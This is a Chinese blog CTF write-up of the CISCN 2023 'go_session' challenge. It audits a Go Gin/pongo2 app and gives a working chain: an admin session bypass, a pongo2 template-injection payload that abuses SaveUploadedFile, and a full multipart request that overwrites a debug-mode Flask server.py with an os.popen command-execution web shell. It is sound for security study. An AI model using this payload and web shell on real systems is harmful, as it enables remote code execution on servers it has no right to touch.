【Go语言】go_session(超级详细)

已于 2024-02-21 22:35:21 修改
阅读量1.1k 收藏 5
点赞数 6
分类专栏: Go语言 文章标签: golang 开发语言 后端
于 2023-08-15 23:50:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62068476/article/details/132292872
版权

目录

前言

国赛初赛有一道题目go session,用go的Gin框架和pongo2模板引擎写的,是关于go的pongo2模板注入和flask的热加载,当时看着一脸懵逼,现在再看突然豁然开朗。

附件

主目录:

在这里插入图片描述
route文件夹:
在这里插入图片描述

代码审计

main.go

package main

import (
	"github.com/gin-gonic/gin"
	"main/route"
)

func main() {
	r := gin.Default()
	r.GET("/", route.Index)
	r.GET("/admin", route.Admin)
	r.GET("/flask", route.Flask)
	r.Run("0.0.0.0:80")
}

main.go主要是引入route文件里面的内容,并且设置路由

route.go

package route

import (
	"github.com/flosch/pongo2/v6"
	"github.com/gin-gonic/gin"
	"github.com/gorilla/sessions"
	"html"
	"io"
	"net/http"
	"os"
)

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "guest"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, guest")
}

func Admin(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		http.Error(c.Writer, "N0", http.StatusInternalServerError)
		return
	}
	name := c.DefaultQuery("name", "ssti")
	xssWaf := html.EscapeString(name)
	tpl, err := pongo2.FromString("Hello " + xssWaf + "!")
	if err != nil {
		panic(err)
	}
	out, err := tpl.Execute(pongo2.Context{"c": c})
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	c.String(200, out)
}

func Flask(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		if err != nil {
			http.Error(c.Writer, "N0", http.StatusInternalServerError)
			return
		}
	}
	resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	c.String(200, string(body))
}

这是一个路由文件,使用了Gin框架和pongo2的模板引擎

主要定义了三个路由函数,接下来逐步分析

Index函数

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "guest"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, guest")
}

Index函数用于处理根路径下的请求,它的参数是一个指向gin.Context的指针,而gin.Context是Gin框架中的一种上下文对象类型。它是一个包含了当前http请求和响应的信息、操作方法和属性的结构体,用于在处理http请求时传递和操作这些信息。同时gin.Context还提供了一系列的方法用于处理这些信息,这个将是我们后面利用的重点。

函数首先会获取名为 session-name 的cookie会话,然后判断会话中的name值是否为,如果为空,就会将name的值设置为guest,然后将会话保存到请求中,最后使用String方法返回一个状态码和一个字符串。

当我们直接访问时就会出现下面的页面

在这里插入图片描述

Admin函数

func Admin(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		http.Error(c.Writer, "N0", http.StatusInternalServerError)
		return
	}
	name := c.DefaultQuery("name", "ssti")
	xssWaf := html.EscapeString(name)
	tpl, err := pongo2.FromString("Hello " + xssWaf + "!")
	if err != nil {
		panic(err)
	}
	out, err := tpl.Execute(pongo2.Context{"c": c})
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	c.String(200, out)
}

Admin函数用于处理 /admin 下的请求,首先会获取会话,然后判断name字段的值是不是admin,如果不是就立即返回No,所以这里要进行session-name构造,使name字段的值为admin,然后进行下一步的操作,接着就是获取url请求中name字段的值,默认值是ssti,接着用EscapeString函数进行转义,防止XSS攻击,然后使用pongo2的模板引擎将字符串"Hello"和转义后的name字段值作为模板内容写入模板中,然后就是执行模板,将执行的结果存储在out中,最后返回out。

直接访问就会出现下面的页面

在这里插入图片描述

Flask函数

func Flask(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		if err != nil {
			http.Error(c.Writer, "N0", http.StatusInternalServerError)
			return
		}
	}
	resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	c.String(200, string(body))
}

Flask函数用于处理 /flask 函数下的请求,首先获取会话,然后判断name字段是否为空,如果不为空则获取url中name字段的值,并将其与本地地址拼接,发送一个GET请求。请求结束后关闭响应体,然后读取响应题的内容,将其转换为字符串返回。

当我们直接访问 /flask 目录并设置参数 name=1 时会出现以下页面

在这里插入图片描述
显示并没有找到资源,如果我们对参数进行一波Fuzz的话就会发现有报错页面出现

在这里插入图片描述
我们把报错信息复制下来然后保存为html文件,然后分析报错信息我们可以找到server.py的文件源码
在这里插入图片描述

server.py

from flask import *

app = Flask(__name__)

 

@app.route('/')

def index():

    name = request.args['name']

    return name + " no ssti"

 

if __name__== "__main__":

    app.run(host="0.0.0.0",port=5000,debug=True)

看这个源码,很显然在5000端口搭建的是一个flask的程序,而且更重要的是,这个程序设置了debug=True,说明程序开启了热加载功能,代码在更改后会自动重新加载程序,这意味着我们对代码进行更改后就会立即生效

问题

上面的报错信息虽然爆出了源码,但让我百思不得其解的是,这个报错信息说的是我的参数中没有包含 name 键,我直接???,不是,我访问的url就是 /flask?name=,虽然我这name没设置键值,但也不能说我参数中没name键吧,难道?有鬼?

终于,在我反复拿着源码研读的时候终于发现了问题所在:

/flask路径下的处理逻辑是这样的

resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))

这个通过参数拼接访问本地5000端口上的flask程序,问题就出在拼接上,c.DefaultQuery()获取的是url请求中name参数的值直接拼接上去,如果我传入的name的值为空的话,c.DefaultQuery()就是空,那就相当于直接访问http://127.0.0.1:5000/,而再去查看刚才报错发现的源码server.py


@app.route('/')

def index():

    name = request.args['name']

    return name + " no ssti"

这个文件在根路径会获取参数name值并返回,我之前没传入name值,怪不得会报错。

原来,这个世界上没有鬼,只有我这个菜鸡!(哭)

思路

本地搭建环境

刚开始拉代码的时候没拉下来,建议换一下代理,设置以下GoProxy

go env -w GOPROXY=https://goproxy.io,direct

admin绕过

将Index函数改成:

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		session.Values["name"] = "admin"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}
	message := fmt.Sprintf("Hello, %s", session.Values["name"])
	c.String(200, message)
}

这样当我们在访问根目录时就会获取到name值为admin的session-name了,然后我们就可以带着这个session-name访问/admin路径进行ssti注入了,常见的方式是直接注入读取文件找到flag,但是gin.Context对象本身并没有直接读取文件的方法,因为读取文件一般是服务端的操作,跟请求处理无关,但这样也表明它可以读取请求中包含的文件,也就是上传文件,而且gin.Context对象有处理文件上传的方法。

SaveUploadedFile方法

SaveUploadedFile方法用于保存上传的文件到指定的路径,这样我们就可以任意上传文件,然后将server.py替换执行任意内容。

所以我们的payload的url参数应该是这样的

{{c.SaveUploadedFile(c.FormFile("file"),"/app/server.py")}}

但是因为参数经过 html.EscapeString(name) 转义,会将双引号转义掉,所以要换一种方式,对于"file",gin.Context还提供了另一种方法,HandlerName() 方法,用于返回主处理程序的名称,这里返回的就是admin/route.Admin,然后可以用过滤器last获取最后一个字符串。对于 “/app/server.py”,可以在请求头中将Referer字段设置成 “/app/server.py”,然后用 Request.Referer()方法获取Referer的值

所以payload就是这样的

{{c.SaveUploadedFile(c.FormFile(c.HandlerName(),c.Request.Referer()))}}

但是在数据包中添加请求头时还要添加 Content-Type 头

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8ALIn5Z2C3VlBqND

对于添加这个头的解释是

对表单提交,浏览器会自动设置合适的 Content-Type 请求,同时
生成一个唯一的边界字符串,并在请求体中使用这个边界字符串将不
的表单字段和文件进行分隔。如果表单中包含文件上传的功能,需要
使用 multipart/form-data 类型的请求体格式。

payload

整体的数据包是这样的

GET /admin?name={{c.SaveUploadedFile(c.FormFile(c.HandlerName()|last),c.Request.Referer())}} HTTP/1.1
Host: node1.anna.nssctf.cn:28421
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: session-name=MTY5MTk5NTYxNnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkc1aGJXVUdjM1J5YVc1bkRBY0FCV0ZrYldsdXwAose6mBW42KwvBV0MfmwHk6ygJ3VCQ6Fh1BYVHxqahA==
Referer: /app/server.py
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8ALIn5Z2C3VlBqND
Connection: close
Content-Length: 427

------WebKitFormBoundary8ALIn5Z2C3VlBqND
Content-Disposition: form-data; name="n"; filename="1.py"
Content-Type: text/plain

from flask import *
import os
app = Flask(__name__)


@app.route('/')
def index():
    name = request.args['name']
    file=os.popen(name).read()
    return file


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)
------WebKitFormBoundary8ALIn5Z2C3VlBqND--

在这里插入图片描述
这个上传的文件也很简单,接收一个名为 name 的参数,并使用 os.popen() 执行该参数作为命令,并返回执行结果
然后访问 /flask?name=?name=env,找到Flag
在这里插入图片描述
这里再解释一下为什么是

/flask?name=?name=env

而不是

/flask?name=env

还是上面说的那个原因,写成name=?name=env,拼接出来的url是
http://127.0.0.1:5000/?name=env
这样就可以接收到参数name并执行命令了
但写成name=env,拼接出来的url就是
http://127.0.0.1:5000/env
这样没有传入参数name,后端接收不到name参数就什么也执行不了了

总结

下辈子再也不学安全了!

拉马努金的小石头
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
go学习 --- web的session会话
qq_46093575的博客
02-06 230
一、session会话 1、session.go package main import ( "crypto/rand" "encoding/base64" "fmt" "io" "net/http" "net/url" "sync" "time" ) type Session interface { Set(key, value interface{}) error //set session value Get(key interface{}) interface{} /
[CISCN 2023 初赛]go_session 解题思路&过程
iamblackcat's blog
07-23 1046
[CISCN 2023 初赛]go_session 解题思路&过程
Go 如何使用session
热门推荐
无风的雨
12-07 1万+
Go 语言实现操作session不像cookie那样,net/http包里有现成函数可以很方便的使用,一些web服务用到session的话,没办法地自己敲代码实现。 Go具体实现session: 服务端可以通过内存、redis、数据库等存储session数据(本例只有内存)。 通过cookie将唯一SessionID发送到客户端 session.go package session impo...
golang session实现库 支持cookie, redis,mysql等多种存储方式
最新发布
05-20 814
GitHub - tekintian/go-sessions: go语言里面的Sessions实现库, 支持众多的Session存储方式,cookie, redis, mysql等。golang中官方是不支持session的, 如果想要实现session则需要自己动手来实现,或者使用第三方的go-session实现库, 今天就给大家介绍一个go语言的第三方session实现库 go-sessions,支持 的存储方式有 cookie, file, redis, mysql等众多的存储。
go Session的实现(一)
luyoung0001@gmail.com的博客
09-02 805
众所周知,http协议是无状态的,这对于服务器确认是哪一个客户端在发请求是不可能的,因此为了能确认到,通常方法是让客户端发送请求时带上身份信息。容易想到的方法就是客户端在提交信息时,带上自己的账户和密码。但是这样存在着严重的安全问题,可以改进的方法就是,服务器给一个确定的客户端返回一个唯一 id,客户端将这个 id 保存在本地,每次发送请求时只需要携带着这个 id,就可以做到较好的验证。
go语言web开发系列之二十九:gin框架用gin-contrib/sessions库管理session(基于cookie)
刘老师的技术森林
02-05 2495
一,安装用到的库: 1,库的地址: https://github.com/gin-contrib/sessions 2,从命令行安装: liuhongdi@ku:~$ go get -u github.com/gin-contrib/sessions 说明:刘宏缔的go森林是一个专注golang的博客, 地址:https://blog.csdn.net/weixin_43881017 说明:作者:刘宏缔 邮箱: 371125307@qq.com 二,演示项目的相关信息 ...
在 Go 语言中使用 Session(一)
weixin_30340353的博客
01-18 415
在上一篇博客 理解Cookie和Session 中,我们了解了 Cookie 和 Session 的一些基础知识,也知道了 Session 的基本原理是由服务端保存一份状态信息(以及它的唯一标识符),客户端会通过这个唯一标识符来访问这份状态信息数据。 整个客户端和服务端的交互过程可以概括为以下三个步骤: 客户端第一次发送请求时,服务端创建 Session,并生成唯一标识符 Sessio...
Go语言_web_编程.pdf
05-11
Go 语言,也被称为 Golang,是由 Google 设计的一种现代化的编程语言,旨在解决软件构建中的效率、并发性、安全性和可维护性问题。Go 语言以其高效的性能、简洁的语法和内置的并发支持而受到广泛关注,特别适用于...
top_session.zip_top session orac
09-21
标题中的"top_session.zip_top session orac"指出这是一个与监控Oracle数据库中最活跃会话相关的压缩文件。"top session"通常指的是在数据库系统中消耗资源最多的会话,这可能包括CPU使用率、I/O操作或者内存占用等...
php_session_decoder, 在Go中,编写了PHP会话编码器/解码器.zip
09-18
php_session_decoder, 在Go中,编写了PHP会话编码器/解码器 php_session_decoderPHP会话编解码器/解码器 安装安装:安装推荐的方法是使用 gonuts.io:nut获取 yvasiyarov/php_session_decoder详细信息,请转到 http:/
session_transfer.zip_between_session_transfer
09-23
在ASP.NET开发中,"session_transfer.zip_between_session_transfer"这个主题涉及到的是页面间会话状态的传递。会话(Session)是ASP.NET提供的一种机制,用于在用户与服务器交互的不同请求之间存储和检索数据,这...
Go-GosessionGo编程语言最快的Websession管理器
08-14
Go session:Go编程语言最快的Web session管理器。同时支持net/http和fasthttp
Go-Sessions用于http服务器的简单高性能高度可定制的用户会话
08-13
Sessions 用于http服务器的简单,高性能,高度可定制的用户会话
解决Django no such table: django_session的问题
01-20
描述:今天第一次使用Django中的session,只要出现”session[‘key’]”就会报错。 解决方法: 1. 进入cmd,通过cd命令进入到项目根目录下,即manage.py文件所在的文件夹。 2. 看一下Django的版本号(我的是1.10.1),...
Go语言WEB框架:session
haming123的专栏
02-22 653
Session wego使用缓存引擎来存储session数据,目前wego支持以下类型的缓存引擎: cookie memory(使用本地内存的缓存引擎) redis memcache 使用cookie引擎存储session数据 本节我们使用cookie引擎存储session数据,并实现用户登录验证以及获取用户登录信息。 首先初始化Session: func main() { web, err := wego.NewWeb() if err != nil{ log.Error(err) r
GoWeb——Session和Cookie
吴声子夜歌的博客
05-24 383
HTTP协议是一种无状态协议,即服务器端每次接收到客户端的请求都是一个全新的请求,服务器端并不知道客户端的历史请求记录。session和cookie的主要目的就是为了弥补HTTP的无状态特性。session是什么客户端请求服务器端,服务器端会为这次请求开辟一块内存空间,这个对象便是session对象,存储结构为ConcurrentHashMap。session弥补了HTTP的无状态特性,服务器端可以利用session存储客户端在同一个会话期间的一些操作记录。session如何判断是否为同一个会话。
GO WEB 学习笔记(四)Session和数据存储
qq_41816516的博客
05-21 305
文章目录Session和CookieGo 语言对Cookie的操作Go 语言如何使用Session Session和Cookie Session和Cookie是如何来的? 首先我们想想这样一个场景,你登陆微博个人主页的时候,是不是需要登录,你登陆之后,是不是就可以跳转来到你的个人主页,这个时候还没有问题产生,因为你登陆输入了用户和密码,自然而然就可以跳转到你对应的个人页面,但是问题就来了,你要去其他页面并且保存你登陆的状态怎么验证,因为http请求是没有状态的,他不知道有没有登录,这个时候怎么办呢? 所以
【GoCN酷Go推荐】会话控制利器 gorilla/sessions
Go中国
07-12 512
推荐gorilla/sessions的背景在日常 Web 应用开发过程中,需要对用户登录状态进行判断,而 HTTP 是无状态的,即不记录用户登录状态,想要得到用户登录状态得把登录状态保...
【Go Web学习笔记】第九章 Go与Session
ClimberCoding
11-22 776
前言:大家好,以下所有内容都是我学习韩茹老师的教程时所整理的笔记。部分内容有过删改, 推荐大家去看原作者的文档进行学习, 本文章仅作为个人的学习笔记,后续还会在此基础上不断修改。学习Go Web时应该已经熟悉Go语言基本语法以及计算机网络的相关内容。 学习链接:https://www.chaindesk.cn/witbook/17/253 参考书籍:《Go Web编程》谢孟军 第九章、session Web开发中一个很重要的议题就是如何做好用户的整个浏览过程的控制,因为HTTP协议是无状态的,所以用户.
void nc_session_close(struct nc_session* session, NC_SESSION_TERM_REASON reason)
06-06
这是一个函数声明,它声明了一个名为nc_session_close的函数,该函数接受两个参数:一个指向nc_session类型的指针和一个NC_SESSION_TERM_REASON类型的值。函数的作用是关闭给定的nc_session会话,并指定关闭的原因。 具体实现可能因语言和上下文而异,无法确定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

拉马努金的小石头

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值